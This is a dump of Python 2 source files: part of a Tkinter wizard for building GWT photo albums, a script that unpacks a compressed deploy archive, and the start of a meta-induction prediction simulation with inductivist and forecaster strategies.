ret.append(self.files[self.entries[centerImg+1]])
else:
ret.append(None)
return ret
def ImagesToCanvas(canvas, imgPaths):
"""Adds the 3 images from imgPaths (list of filepaths) to a canvas,
the center image slightly bigger. Returns a list of tuples (tag, img)."""
ret = []
w = int(canvas["width"])/4
h = int(canvas["height"])
ww = [w*2/3, 2*w, w*2/3]
hh = [h*2/3, h, h*2/3]
for i in range(3):
if imgPaths[i]:
img = thumbDb.get(imgPaths[i], ww[i], hh[i])
tag = canvas.create_image(w/2 + i*3*w/2, h/2, image = img)
ret.append((tag, img))
else:
ret.append((-1, None))
return ret
class Card:
def __init__(self, frame):
self.frame = frame
def activate(self):
pass
def deactivate(self):
pass
def validate(self):
return True
class CardStack(Frame):
def __init__(self, parent, action = None):
Frame.__init__(self, parent)
self.config(relief=FLAT, bd=0)
self.buttonrow = Frame(self, relief=SUNKEN, bd=2)
self.buttonrow.pack(side=TOP, fill=X)
self.cardstack = Frame(self, relief=RAISED, bd=2)
self.cardstack.pack(side=BOTTOM, fill=BOTH, expand=1)
self.cardstack.config(width=FRAME_W, height=FRAME_H)
self.buttons = {}
self.cards = {}
self.cardList = []
self.last = None
self.action = action
def add(self, name, createCardFunc):
button = Button(self.buttonrow, bd=2, text=name, relief = SUNKEN,
command=lambda self=self,t=name: self.switch(t))
button.pack(side=LEFT, fill=Y)
self.buttons[name] = button
frame = Frame(self.cardstack, bd=0, relief=FLAT)
frame.place(relx=0.0, rely=0.0, relwidth=1.0, relheight=1.0)
#card.pack(fill=BOTH, expand=1)
card = createCardFunc(frame)
self.cards[name] = card
self.cardList.append(name)
return card
def currentCard(self):
return self.last
def getCard(self, name):
return self.cards[name]
def switch(self, name):
if self.last:
self.buttons[self.last]["relief"] = SUNKEN
self.cards[self.last].deactivate()
self.buttons[name]["relief"] = RAISED
self.last = name
card = self.cards[name]
card.frame.tkraise()
card.activate()
if self.action: self.action()
class AboutCard(Card):
def __init__(self, parent, start = lambda:1, quit = lambda:1):
Card.__init__(self, parent)
self.parent = parent
label = Label(parent, text='About "GWTPhotoAlbumCreator.py":')
label.pack()
self.text=Text(parent)
self.text.pack(fill=BOTH, expand=1)
f = Frame(parent); f.pack()
Button(f, text="Start ->", command=start).pack(side=LEFT)
Button(f, text="Quit!", command=quit).pack(side=RIGHT)
def activate(self):
self.text.delete("1.0", END)
self.text.insert(END, about_text)
def clear(self):
self.text.delete("1.0", END)
def logger(self, text):
self.text.insert(END, text+"\n")
#self.parent.update_idletasks()
self.parent.update()
class CaptionsCard(Card):
def __init__(self, parent, album):
Card.__init__(self, parent)
self.album = album
label = Label(parent, text="Add images and enter image captions:")
label["bg"] = "#FFFF50"
label.pack(side=TOP)
self.top = Canvas(parent)
self.top.pack(side=TOP)
self.top["width"] = FRAME_W-40
self.top["height"] = FRAME_H/2
w = int(self.top["width"])
h = int(self.top["height"])
self.images = [(-1, None), (-1, None), (-1, None)]
bottom = Frame(parent)
bottom.pack(side=BOTTOM, fill=BOTH, expand=1)
upper_bottom = Frame(bottom)
upper_bottom.pack(side=TOP, fill=BOTH, expand=1)
left = Frame(upper_bottom)
left.pack(side=LEFT, fill=BOTH, expand=1)
buttonRow = Frame(left)
buttonRow.pack(side=TOP, fill=X)
self.add = Button(buttonRow, text="Add ...", command=self.onAdd)
self.add["width"] = 6
self.add.pack(side=LEFT)
self.sort = Button(buttonRow, text="Sort by Date & Time", command=self.onSort)
self.sort["width"] = 15
self.sort.pack(side=LEFT)
self.sortAlpha = Button(buttonRow, text="Sort by Name", command=self.onSortAlpha)
self.sortAlpha["width"] = 12
self.sortAlpha.pack(side=LEFT)
self.remove = Button(buttonRow, text="Remove", command=self.onRemove)
self.remove["width"] = 6
self.remove.pack(side=RIGHT)
lbox = Frame(left)
lbox.pack(side=BOTTOM, fill=BOTH, expand=1)
scrollbar = Scrollbar(lbox, orient=VERTICAL)
self.listbox = Listbox(lbox, selectmode = EXTENDED,
yscrollcommand=scrollbar.set)
scrollbar.config(command=self.listbox.yview)
scrollbar.pack(side=RIGHT, fill=Y)
self.listbox.pack(side=TOP, fill=BOTH, expand=1)
self.listbox.bind("<ButtonRelease-1>", lambda event: self.onSelect())
self.listbox.bind("<Up>", lambda event: self.onKeyUp())
self.listbox.bind("<Down>", lambda event: self.onKeyDown())
if self.album.entries:
self.selection = self.album.entries[0]
else:
self.selection = ""
buttonCol = Frame(upper_bottom)
buttonCol.pack(side= RIGHT)
self.up = Button(buttonCol, text="up", command=self.onUp)
self.up["width"] = 5
self.up.pack()
self.down = Button(buttonCol, text="down", command=self.onDown)
self.down["width"] = 5
self.down.pack()
lower_bottom = Frame(bottom)
lower_bottom.pack(side=BOTTOM)
lower_left = Frame(lower_bottom)
lower_left.pack(side=LEFT)
self.loadCapJSON = Button(lower_left, text="Load captions...", command=self.loadFromJSON)
self.loadCapJSON.pack(side=TOP)
self.saveCapJSON = Button(lower_left, text="Save captions...", command=self.writeToJSON)
self.saveCapJSON.pack(side=BOTTOM)
self.textedit = Text(lower_bottom)
self.textedit["height"] = 5
self.textedit["width"] = 70
self.textedit["background"] = "#FFFFCF"
self.textedit.pack(side=LEFT)
right = Frame(lower_bottom)
right.pack(side=RIGHT)
self.reset = Button(right, text="Reset", command=self.onReset)
self.reset.pack(side=TOP)
self.saveIt = BooleanVar()
self.saveCheck = Checkbutton(right, text="Add to image file",
var = self.saveIt)
self.saveCheck["width"]=20
self.saveCheck.pack(side=BOTTOM)
def onUp(self):
items = [int(s) for s in self.listbox.curselection()]
items.sort()
i = 0
while len(items) > 0 and items[0] == i:
del items[0]
i += 1
for i in items:
name = self.album.entries[i]
del self.album.entries[i]
self.album.entries.insert(i-1, name)
self.listbox.delete(i)
self.listbox.insert(i-1, name)
for i in items:
self.listbox.select_set(i-1)
self.onSelect()
def onDown(self):
items = [int(s) for s in self.listbox.curselection()]
items.sort()
items.reverse()
i = len(self.album.entries)-1
while len(items) > 0 and items[0] == i:
del items[0]
i -= 1
for i in items:
name = self.album.entries[i]
del self.album.entries[i]
self.album.entries.insert(i+1, name)
self.listbox.delete(i)
self.listbox.insert(i+1, name)
for i in items:
self.listbox.select_set(i+1)
self.onSelect()
def onAdd(self):
formats = [("JPEG", "*.jpg"),
("Portable Network Graphics", "*.png"),
("All file types", "*")]
flist = tkFileDialog.askopenfilenames(title="Please select images",
filetypes = formats)
flist = compatibleFileDialogResult(flist)
for path in flist:
if os.path.exists(path):
name = self.album.add(path)
self.listbox.insert(END, name)
if self.album.entries and not self.selection:
self.select(self.album.entries[0])
def onRemove(self):
items = [int(s) for s in self.listbox.curselection()]
items.sort()
items.reverse()
for i in items:
name = self.album.entries[i]
self.selection = name
self.storeCaption()
self.album.remove(name)
self.listbox.delete(i)
if items and items[-1] < len(self.album.entries):
self.selection = self.album.entries[items[-1]]
self.select(self.selection)
else:
self.selection = ""
def onSort(self):
file_list = [self.album.files[entry] for entry in self.album.entries]
file_list = createGWTPhotoAlbum.sort_images(file_list)
self.album.entries = [os.path.basename(path) for path in file_list]
for entry in self.album.entries:
self.listbox.delete(0)
self.listbox.insert(END, entry)
self.select(self.selection)
def onSortAlpha(self):
self.album.entries.sort()
for entry in self.album.entries:
self.listbox.delete(0)
self.listbox.insert(END, entry)
self.select(self.selection)
def select(self, name):
self.selection = name
self.listbox.select_set(self.album.entries.index(name))
self.onSelect()
def activate(self):
self.listbox.delete(0, END)
for e in self.album.entries:
self.listbox.insert(END, e)
if self.selection in self.album.entries:
self.select(self.selection)
elif len(self.album.entries) > 0:
self.selection = self.album.entries[0]
self.select(self.album.entries[0])
else:
self.selection = ""
if self.selection:
self.textedit.delete("1.0", END)
self.textedit.insert(END, self.album.getCaption(self.selection))
def storeCaption(self):
if self.selection:
caption = self.textedit.get("1.0", END)
self.album.changeCaption(self.selection, caption,
False) # self.saveIt.get()
def deactivate(self):
self.storeCaption()
if self.saveIt.get() and self.album.captionsTouched and \
askyesno(title="Question:",
message="Do you really want to write back\n"+
"changed captions to the original\n"+
"image files?"):
self.album.writeBackCaptions()
self.textedit.delete("1.0", END)
def updateCanvas(self, selected):
self.top.delete(ALL)
newSelection = ""
if selected >= 0:
self.images = ImagesToCanvas(self.top, self.album.pick(selected))
newSelection = self.album.entries[selected]
if newSelection != self.selection:
self.storeCaption()
self.selection = newSelection
caption = self.album.getCaption(newSelection)
self.textedit.delete("1.0", END)
self.textedit.insert(END, caption)
def readSelection(self):
items = self.listbox.curselection()
if items:
return int(items[0])
else:
return -1
def onSelect(self):
self.updateCanvas(self.readSelection())
def onKeyUp(self):
nr = self.readSelection()
if nr > 0:
self.updateCanvas(nr-1)
def onKeyDown(self):
nr = self.readSelection()
if nr < len(self.album.entries)-1:
self.updateCanvas(nr+1)
def onReset(self):
if self.selection:
caption = self.album.getCaption(self.selection)
else:
caption = ""
self.textedit.delete("1.0", END)
self.textedit.insert(END, caption)
def loadFromJSON(self):
flist = tkFileDialog.askopenfilenames(title="Open captions file...",
filetypes = [("JSON file", "*.json"),
("All files", "*")],
initialfile = "captions.json",
multiple = False)
if flist:
name = compatibleFileDialogResult(flist)[0]
try:
f = open(name)
str = f.read()
f.close()
try:
cap = fromJSON(str)
except ValueError:
showerror(title = "Error:",
message = "file: "+name+" is malformed!")
if type(cap) == type({}):
self.album.captions = cap
caption = self.album.getCaption(self.selection)
self.textedit.delete("1.0", END)
self.textedit.insert(END, caption)
else:
showerror(title = "Error:",
message = "file "+name+" does not contain a\n"+
"captions dictionary")
except IOError:
showerror(title = "Error:",
message = "could not read file: "+name)
def writeToJSON(self):
name = tkFileDialog.asksaveasfilename(title="Write captions file...",
filetypes = [("JSON file", "*.json"),
("All files", "*")],
initialfile = "captions.json")
if name:
#name = compatibleFileDialogResult(flist)[0]
if not name.lower().endswith(".json"):
name += ".json"
else: name = ""
if name and (not os.path.exists(name) or \
askyesno(title="Question:",
message="Do you really want to overwrite\n"+
"file: '"+name+"' ?")):
str = toJSON(self.album.captions)
try:
f = open(name, "w")
f.write(str)
f.close()
except IOError:
showerror(title = "Error:",
message = "could not read file: "+name)
def validate(self):
if len(self.album.entries) == 0:
showerror(title="GWTPhotoAlbumCreator.py - Missing data!",
message="Please add some images first!")
return False
else:
return True
class ResolutionsCard(Card):
def __init__(self, parent, album):
Card.__init__(self, parent)
self.album = album
self.resolutions = selectableResolutions
self.rack = {}
for res in self.resolutions:
self.rack[res] = BooleanVar()
label = Label(parent, text="Select destination image resolutions "+\
"and compression:")
label["bg"] = "#FFFF50"
label.pack()
Label(parent, text=" ").pack()
f1 = Frame(parent)
f1.pack()
for res in self.resolutions:
cb = Checkbutton(f1, text="%sx%s pixel"%res,
var = self.rack[res])
cb.pack(anchor=W)
Label(parent, text=" ").pack()
Label(parent, text="Compression:").pack()
f2 = Frame(parent)
f2.pack()
f3 = Frame(f2)
f3.pack(side=LEFT)
Label(f3, text="LowRes").pack()
self.lowResComp = IntVar()
self.lowResComp.set(85)
self.lowResScale = Scale(f3, var=self.lowResComp)
self.lowResScale["from"] = 50
self.lowResScale["to"] = 95
self.lowResScale.pack()
f4 = Frame(f2)
f4.pack(side=RIGHT)
Label(f4, text="HiRes").pack()
self.hiResComp = IntVar()
self.hiResComp.set(70)
self.hiResScale = Scale(f4, var=self.hiResComp)
self.hiResScale["from"] = 50
self.hiResScale["to"] = 95
self.hiResScale.pack()
Label(parent, text="Smaller values mean smaller image sizes\n"+
"but also more compression artifacts!").pack()
def activate(self):
for res in self.resolutions:
self.rack[res].set(res in self.album.resolutions)
self.lowResComp.set(self.album.compression[0])
self.hiResComp.set(self.album.compression[1])
def deactivate(self):
self.album.compression = (self.lowResComp.get(), self.hiResComp.get())
self.album.resolutions = set([res for res in self.rack.keys()
if self.rack[res].get()])
def validate(self):
if len(self.album.resolutions) == 0:
showerror(title="GWTPhotoAlbumCreator.py - Missing data!",
message="Please select one or more image resolutions!")
return False
else:
return True
class ConfigurationCard(Card):
def __init__(self, parent, album):
Card.__init__(self, parent)
self.album = album
label = Label(parent, text="Adjust the configuration, please:")
label["bg"] = "#FFFF50"
label.pack()
Label(parent, text=" ").pack()
self.gallery = BooleanVar()
self.galleryTitle = StringVar()
self.gallerySubtitle = StringVar()
self.galleryBottomLine = StringVar()
self.fullscreen = BooleanVar()
self.filmstrip = BooleanVar()
self.fullSizeImages = BooleanVar()
self.overblend = BooleanVar()
self.createhtml = BooleanVar()
self.outputFolder = StringVar()
f1 = Frame(parent)
f1.pack()
Checkbutton(f1, text="with gallery", var = self.gallery).pack(anchor=W)
Label(f1, text=" ").pack()
f2 = Frame(f1)
f2.pack(expand=1, fill=X)
f = Frame(f2); f.pack(expand=1, fill=X)
Label(f, text="gallery title: ").pack(anchor=W, side=LEFT)
Entry(f, textvariable=self.galleryTitle, width="50").pack(side=RIGHT)
f = Frame(f2); f.pack(expand=1, fill=X)
Label(f, text="gallery sub-title:").pack(anchor=W, side=LEFT)
Entry(f, textvariable=self.gallerySubtitle, width="50").pack(side=RIGHT)
f = Frame(f2); f.pack(expand=1, fill=X)
Label(f, text="gallery bottom line:").pack(anchor=W, side=LEFT)
Entry(f, textvariable=self.galleryBottomLine, width="50").pack(side=RIGHT)
Label(f1, text=" ").pack()
#Checkbutton(f1, text="full screen slide show", var = self.fullscreen).pack(anchor=W)
Checkbutton(f1, text="add a film strip", var = self.filmstrip).pack(anchor=W)
#Checkbutton(f1, text="include original images", var = self.fullSizeImages).pack(anchor=W)
Checkbutton(f1, text="overblend when changing images", var = self.overblend).pack(anchor=W)
Checkbutton(f1, text="add javascript free version", var = self.createhtml).pack(anchor=W)
Label(f1, text=" ").pack()
f = Frame(f1); f.pack()
Label(f, text="output folder: ").pack(side=LEFT)
Entry(f, textvariable=self.outputFolder, width="45").pack(side=LEFT)
Button(f, text="Browse ...", command=self.onBrowseOutputFolder).pack(side=LEFT)
def activate(self):
self.gallery.set(self.album.gallery)
self.galleryTitle.set(self.album.title)
self.gallerySubtitle.set(self.album.subtitle)
self.galleryBottomLine.set(self.album.bottomline)
self.fullscreen.set(self.album.fullscreen)
self.filmstrip.set(self.album.filmstrip)
self.fullSizeImages.set(self.album.originals)
self.overblend.set(self.album.overblend)
self.outputFolder.set(self.album.destfolder)
self.createhtml.set(self.album.createhtml)
def deactivate(self):
self.album.gallery = self.gallery.get()
self.album.title = self.galleryTitle.get()
self.album.subtitle = self.gallerySubtitle.get()
self.album.bottomline = self.galleryBottomLine.get()
self.album.fullscreen = self.fullscreen.get()
self.album.filmstrip = self.filmstrip.get()
self.album.originals = self.fullSizeImages.get()
self.album.overblend = self.overblend.get()
self.album.destfolder = self.outputFolder.get()
self.album.createhtml = self.createhtml.get()
def onBrowseOutputFolder(self):
outdir = tkFileDialog.askdirectory(title="Choose output directory")
if outdir and type(outdir) == type(""):
outdir = os.path.normpath(outdir)
if outdir: self.outputFolder.set(outdir)
def validate(self):
if self.album.gallery and not self.album.title:
return askyesno(title="GWTPhotoAlbumCreator.py - Missing data?",
message="Do you really want to leave the title\n"+
"of your gallery empty?")
else:
return True
class WebAlbumCreator(Tk):
def __init__(self):
Tk.__init__(self)
self.title("GWTPhotoAlbumCreator %s" % VERSION)
# self.config(width=800, height=600)
self.protocol("WM_DELETE_WINDOW", self.onQuit)
self.changes = False
self.frame = Frame(self)
self.frame.pack()
self.cardStack = CardStack(self.frame, self.onSelectCard)
self.cardStack.pack(side=TOP, fill=BOTH, expand=1)
self.buttonRow = Frame(self.frame)
self.buttonRow.pack(fill=X)
self.next = Button(self.buttonRow, text="Next Step ->",
command=self.onNext)
self.next["width"] = 14
self.next.pack(side=RIGHT, anchor=E)
self.previous = Button(self.buttonRow, text="<- Previous Step",
command=self.onPrev)
self.previous["width"] = 14
self.previous.pack(side=RIGHT, anchor=E)
self.album = WebAlbum()
self.cardStack.add("About",
lambda frame: AboutCard(frame, self.jumpStart, self.onQuit))
self.cardStack.add("Images",
lambda frame: CaptionsCard(frame, self.album))
self.cardStack.add("Resolutions",
lambda frame: ResolutionsCard(frame, self.album))
self.cardStack.add("Configuration",
lambda frame: ConfigurationCard(frame, self.album))
self.cardStack.switch("About")
def onNext(self):
name = self.cardStack.currentCard()
i = self.cardStack.cardList.index(name)
if i == len(self.cardStack.cardList)-1:
self.cardStack.getCard(name).deactivate()
for n in self.cardStack.cardList:
if not self.cardStack.getCard(n).validate():
self.cardStack.switch(n)
break
else:
self.cardStack.switch("About")
self.cardStack.getCard("About").clear()
self.cardStack.getCard("About").logger("creating web album; please wait...")
if self.album.createWebAlbum(self.cardStack.getCard("About").logger):
self.changes = False
self.cardStack.getCard("About").logger("finished creating web album.")
self.openBrowserWithAlbum()
else:
self.cardStack.getCard("About").logger("error while creating web album!")
else:
self.cardStack.switch(self.cardStack.cardList[i+1])
def openBrowserWithAlbum(self):
if self.album.addjsontohtml:
path = os.path.join(self.album.destfolder, "index_offline.html")
try:
os.startfile(path)
except AttributeError:
if os.system("firefox "+path+" &") != 0:
os.system("iceweasel "+path+" &")
def onPrev(self):
name = self.cardStack.currentCard()
i = self.cardStack.cardList.index(name)
if i > 0:
self.cardStack.switch(self.cardStack.cardList[i-1])
else:
self.cardStack.switch(self.cardStack.cardList[-1])
def onSelectCard(self):
cardName = self.cardStack.currentCard()
if cardName != "About": self.changes = True
if cardName == "Configuration":
self.next["text"] = "Finish"
elif self.next["text"] == "Finish":
self.next["text"] = "Next Step ->"
def jumpStart(self):
self.cardStack.switch("Images")
self.cardStack.getCard("Images").onAdd()
def onQuit(self):
if not self.changes or askyesno(title="GWTPhotoAlbumCreator.py - quit?",
message="Do you really want to quit?"):
self.destroy()
self.quit()
main = WebAlbumCreator()
main.mainloop()
```
#### File: GWTPhotoAlbum/scripts/qzexpand.py
```python
import sys, os
from PyQt4.Qt import QByteArray, qUncompress
destDir = "."
archive = "GWTPhotoAlbum-Deploy.qz"
def expand(archive, destDir):
f = open(archive, "rb")
data = f.read()
f.close()
currDir = os.getcwd()
os.chdir(destDir)
data = qUncompress(QByteArray(data)).data()
i = 0
while i < len(data):
N = int(data[i:i+10], 16); i += 10
path = data[i:i+N]; i += N
dirname, filename = os.path.split(path)
if dirname != "" and not os.path.exists(dirname):
os.makedirs(dirname)
L = int(data[i:i+10], 16); i += 10
content = data[i:i+L]; i += L
print ("writing file: "+filename+" ("+str(L/1024)+" kBytes)")
f = open(path, "wb")
f.write(content)
f.close()
os.chdir(currDir)
if __name__ == "__main__":
if "-h" in sys.argv or "--help" in sys.argv:
print __doc__
else:
if len(sys.argv) > 1:
archive = sys.argv[1]
if len(sys.argv) > 2:
destDir = sys.argv[2]
expand(archive, destDir)
```
|
{
"source": "jecki/MetaInductionSim",
"score": 3
}
|
#### File: jecki/MetaInductionSim/Induction.py
```python
import random
from PyPlotter.Compatibility import *
########################################################################
#
# Global Parameters
#
########################################################################
ERROR_TOLERANCE = 1.0 / 1000000.0
first_from_left = lambda l:l[0]
first_from_right = lambda l:l[-1]
random_choice = random.choice
choice = first_from_left
epsilon = 0.05
epsilonD = 0.04
hardrule = False
########################################################################
#
# Random event series functions
#
########################################################################
def randomBool(p = 0.5):
"""Return True with a probability of p."""
if random.random() < p: return True
else: return False
def getRandomEvent(p = 0.5):
"""Generate a random event that is 1 with the probability p
otherwise 0."""
if random.random() < p: return 1
else: return 0
def invertEvent(e):
"""Return the inverted event."""
if e == 1: return 0
else: return 1
########################################################################
#
# World class
#
########################################################################
class World(object):
"""The world class contains all global variables such as the
lists of predictor strategies, the number of the current round
etc.
Attributes:
round - round number
event - the next event to take place
absFrequency - absolute frequency of the event 1
relFrequency - relative frequency of the event 1
miList - list of predictors that are meta inductivists
non_miList - list of predictors that are not meta
inductivists
miMean - average success rate of all MIs
non_miMean - average success rate of all non MIs
favN - dictionary that records for each strategy the
number of rounds when it is being observed by
any MI
absucc - dictionary that counts the absolute success
of each strategies when it is being observed
by any MI
deceivers - list of deceivers (updated after each round before the
analyse-methods are called)
nondeceivers - list of nondeceivers (updated after each round before the
analyse-methods are called)
ultdeceivers - list of three times out deceivers
nonultdeceivers - list of non three times out deceivers
alldeceivers - list of deceivers and ultdeceivers
nonalldeceivers - list of non alldeceivers
favlist - list of favorites (updated after each round before the
analyse-methods are called)
worldDeceived - A variable taking as its values the predictor that
is deceived by the world (the world can only deceive one
predictor at a time) or None, if there is no world
deception. """
def __init__(self, eventFunction = lambda : getRandomEvent(2.0/3.0)):
self.getEvent = eventFunction
self.round = 0
self.event = 0
self.absFrequency = 0
self.relFrequency = 0.0
self.predictorList = []
self.miList = []
self.non_miList = []
self.miMean = 0.0
self.non_miMean = 0.0
self.deceivers = []
self.nondeceivers = []
self.ultdeceivers = []
self.alldeceivers = []
self.nonalldeceivers = []
self.nonultdeceivers = []
self.favN = {}
self.absucc = {}
self.favlist = []
self.deceiveCount = {}
self.deceiveState = {}
self.worldDeceived = None
def register(self, predictor):
"""Add another predictor strategy. Make sure that meta
inductivists will always be last in the predictor list.
wird nur einmal durchlaufen, vor Simulation"""
assert self.round == 0, "Simulation is already running: " + \
"Predictors can not be added any more!"
if isinstance(predictor, MetaInductivist):
self.miList.append(predictor)
else:
self.non_miList.append(predictor)
self.favN[predictor.name] = 0
self.absucc[predictor.name] = 0
self.nonultdeceivers.append(predictor)
self.deceiveCount[predictor.name] = 0
self.deceiveState[predictor.name] = False
predictor.registeredBy(self)
#print str(predictor)
def getPredictorList(self):
"""-> list of all registered predictors, MIs and non MIs"""
return self.non_miList + self.miList
def nextRound(self):
"""Generate a new event. Let the predictors make their
predictions and evaluate theis predictions, i.e. update
the variables storing the absolute success rate as well
as the relative success rate. Update the event frequency
rates. Finally, call the predictors analyse method.
"""
self.round += 1
if self.worldDeceived:
if isinstance(self.worldDeceived.fav, ObjectInductivist):
if self.relFrequency > 0.5:
self.event = 0
elif self.relFrequency < 0.5:
self.event = 1
else:
self.event = getRandomEvent(0.5)
elif self.worldDeceived.fav == None:
self.event = getRandomEvent(0.5)
else: self.event = self.getEvent()
# wenn worldDeceived und Runde 1, dann in jedem Fall getEandomEvent(0.5)
else:
self.event = self.getEvent()
# zuerst sagen non-mi's voraus, dann erstdie mi's, weil
# die mi's auf Vorhersagen der non-mi's zurückgreifen
for predictor in self.non_miList + self.miList:
e = predictor.predict()
if e == self.event: predictor.success += 1
predictor.successRate = predictor.success / float(self.round)
if self.event == 1: self.absFrequency += 1
self.relFrequency = self.absFrequency / float(self.round)
if self.miList:
self.miMean = sum([p.successRate for p in self.miList]) / \
len(self.miList)
if self.non_miList:
self.non_miMean = sum([p.successRate for p in self.non_miList]) / \
len(self.non_miList)
# zuerst analyse für mi's, dann erst für non-mi's, weil non-mi's
# wissen müssen, ob sie fav's sind.
self.updateControlDictionaries()
for predictor in self.miList + self.non_miList:
predictor.analyse()
def updateControlDictionaries(self):
self.favlist = [m.fav for m in self.miList]
self.deceivers = []
self.nondeceivers = []
for p in self.non_miList:
if p in self.favlist:
self.favN[p.name] += 1
if p.prediction == self.event:
self.absucc[p.name] += 1
if self.deceived(p):
self.deceivers.append(p)
else:
self.nondeceivers.append(p)
for p in self.nonultdeceivers:
if self.ultdeceived(p):
self.ultdeceivers.append(p)
self.nonultdeceivers.remove(p)
self.alldeceivers = list(set(self.deceivers).union(set(self.ultdeceivers)))
self.nonalldeceivers = [x for x in self.non_miList \
if not x in self.alldeceivers]
# Globale Deception detection, in class world
# absucc ist der abs.succ. von a während a fav war
# sucess ist der abs.succ. von a
def _deceptionRule(self, round, n, absucc, success):
if n <= 5:
return False
condSuccRate = absucc / float(n)
if hardrule:
if (round - n) <= 5: return False
invSuccRate = float(success - absucc) / float(round - n)
return invSuccRate > condSuccRate + epsilonD
else:
succRate = success / float(round)
return (succRate > condSuccRate + epsilonD or succRate < epsilonD)
# wozu wird die succRate hier neu bestimmt: weil sie auch bei future_Anwendung
# gebraucht wird. Die Or-Bedingung ist neu!
# Globale FutureDeceived Funktion
# bedeutet: wenn non-MI nächstes Mal richtig vorhersagen würde,
# würde er ein globaler deceiver sein. Wird nur erzeugt wenn a fav ist
def future_deceivedup(self, a):
return self._deceptionRule(self.round+1,
self.favN[a.name],
self.absucc[a.name],
a.success+1)
def future_deceiveddown(self, a):
return self._deceptionRule(self.round+1,
self.favN[a.name]+1,
self.absucc[a.name],
a.success)
def deceived(self, a):
return self._deceptionRule(self.round,
self.favN[a.name],
self.absucc[a.name],
a.success)
def ultdeceived(self, a):
if self.deceiveCount[a.name] >= 3:
return True
else:
if self.deceived(a):
if not self.deceiveState[a.name]:
self.deceiveCount[a.name] += 1
self.deceiveState[a.name] = True
else:
self.deceiveState[a.name] = False
return False
########################################################################
#
# Predictor classes
#
########################################################################
# aus Kompatibilitiätsgründen (jython) werden hier "old style"-Klassen
# verwendet, die nicht von "object" abgeleitet sind. Andernfalls sollte
# man ab Python 2.2 besser "new style"-Klassen verwenden, d.h.
# "class Predictor(object):" schreiben. Auf die Funktion des Programms
# hat das aber keinen Einfluss!
class Predictor:
"""Template for a prediction strategy.
Attributes:
name - predictor's name
short - predictor's short name
suffix - a suffix number to the predictor's name in
order to tell different predictors apart
world - a reference to the world object this predictor
belongs to
success - absolute number of correct predictions
successRate - average rate of correct predictions so far
prediction - prediction made in the current round
(only after method predict has been called)
"""
def __str__(self):
if self.suffix >= 1: return self.name+" "+str(self.suffix)
else: return self.name
def __init__(self, name):
self.name = name
self.short = ""
self.suffix = 0
self.world = None
self.success = 0
self.successRate = 0.0
self.prediction = 0
def shortName(self, length = 3):
"""Returns an abbreviated name of 'length' characters"""
if len(self.short) == length: return self.short
s = str(self)
if len(s) < length:
self.short = s + " "*(length-len(s))
return self.short
r = []; alphaNum = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
for ch in s:
if ch in alphaNum:
r.append(ch)
elif ch in ", ": alphaNum = alphaNum + "0123456789"
elif ch == ".":
del r[-1]
alphaNum = alphaNum[:26]
r = r[:length]
if len(r) < length: r.extend([" "]*(length-len(r)))
if self.suffix >= 1: r[-1] = str(self.suffix)[-1]
self.short = "".join(r)
return self.short
def _determineSuffix(self):
l = [p for p in self.world.getPredictorList() \
if p.name == self.name and p != self]
if l:
if l[-1].suffix == 0: l[-1].suffix = 1
self.suffix = l[-1].suffix + 1
self.short = ""; l[-1].short = ""
def registeredBy(self, world):
"""Associates predictor with a world-object."""
self.world = world
self._determineSuffix()
self.short = ""
self.short = self.shortName(3)
def predict(self):
"""Predict the next event."""
raise NotImplementedError
def analyse(self):
"""Possible analysis of results after the prediction cycle
is finished.
"""
pass
def bestOf(predictorList):
"""Return the most succesful predictor(s) of the list. The
return value is a list of one or more predictors. The latter
is the case if there are several equally good best predictors
in the list.
"""
assert predictorList != [], "Predictor list is empty!"
bestList = []
bestRate = -1.0
for p in predictorList:
if p.successRate > bestRate:
bestList = [p]
bestRate = p.successRate
elif p.successRate == bestRate:
bestList.append(p)
return bestList
def worstOf(predictorList):
"""Return the least succesful predictor(s) of the list. The
return value is a list of one or more predictors. The latter
is the case if there are several equally bad worst predictors
in the list.
"""
assert predictorList != [], "Predictor list is empty!"
worstList = []
worstRate = 2.0
for p in predictorList:
if p.successRate < worstRate:
worstList = [p]
worstRate = p.successRate
elif p.successRate == worstRate:
worstList.append(p)
return worstList
########################################################################
#
# Random Guess
#
########################################################################
""" Hinweis: da RandomGuess als fallback-Strategie für jeden MI separat
durchgeführt wird, dard dieser RandomGuess nur verwendet werden, wenn
worldDeceived None ist"""
class RandomGuess(Predictor):
"""Random Guess Strategy."""
def __init__(self, name = "Random Guess"):
Predictor.__init__(self, name)
def predict(self):
self.prediction = getRandomEvent(0.5)
return self.prediction
########################################################################
#
# Object Inductivist
#
########################################################################
class ObjectInductivist(Predictor):
"""Object inductivist strategy."""
def __init__(self, name = "Object Inductivist"):
Predictor.__init__(self, name)
self.prediction = getRandomEvent()
def predict(self):
if self.world.worldDeceived and (self.world.round == 1\
or self.world.relFrequency == 0.5):
self.prediction = invertEvent(self.world.event)
# in diesem Fall wird überschrieben. self.world.relFrequency ist noch
# auf alten Wert eingestellt. Wenn OI aufgerufen wird, ist er jedenfalls Spieler,
# und ist daher in erster Runde MI-Favorit
return self.prediction
def analyse(self):
if self.world.relFrequency > 0.5: self.prediction = 1
elif self.world.relFrequency < 0.5: self.prediction = 0
else: self.prediction = getRandomEvent(0.5)
########################################################################
#
# Forecaster
#
########################################################################
class Forecaster(Predictor):
"""A prediction strategy that is successfull at a predifined rate.
Attributes:
successAim - the predifined success rate this
Forecaster shall reach
"""
def __init__(self, successAim, name="Forecaster"):
Predictor.__init__(self, name + " %.2f" % successAim)
self.successAim = successAim
def predict(self):
if randomBool(self.successAim): #randomBool(x) liefert einen W.wert 1 mit W.keit x, sonst 0
self.prediction = self.world.event
else:
self.prediction = invertEvent(self.world.event)
return self.prediction
class ForecasterFromBottom(Predictor):
"""A prediction strategy that is successfull at a predifined rate.
Attributes:
successAim - the predifined success rate this
Forecaster shall reach
"""
def __init__(self, successAim, name="Forecaster"):
Predictor.__init__(self, name + " %.2f" % successAim)
self.successAim = successAim
def predict(self):
if randomBool(self.successAim) and self.world.round > 70:
#randomBool(x) liefert einen W.wert 1 mit W.keit x, sonst 0
self.prediction = self.world.event
else:
self.prediction = invertEvent(self.world.event)
return self.prediction
class DelayedForecaster(Forecaster):
"""A prediction strategy that is successfull at a predifined rate
only after a certain while; random success before that while.
Attributes:
successAim - the predifined success rate this
Forecaster shall reach
delay - number of rounds until sucess increases
"""
def __init__(self, successAim, delay, name="Forecaster"):
Predictor.__init__(self, name + " %.2f; %i" % (successAim,delay))
self.successAim = successAim
self.delay = delay
def predict(self):
if self.delay > 0:
self.delay -= 1
self.prediction = getRandomEvent(0.5)
else:
self.prediction = Forecaster.predict(self)
return self.prediction
########################################################################
#
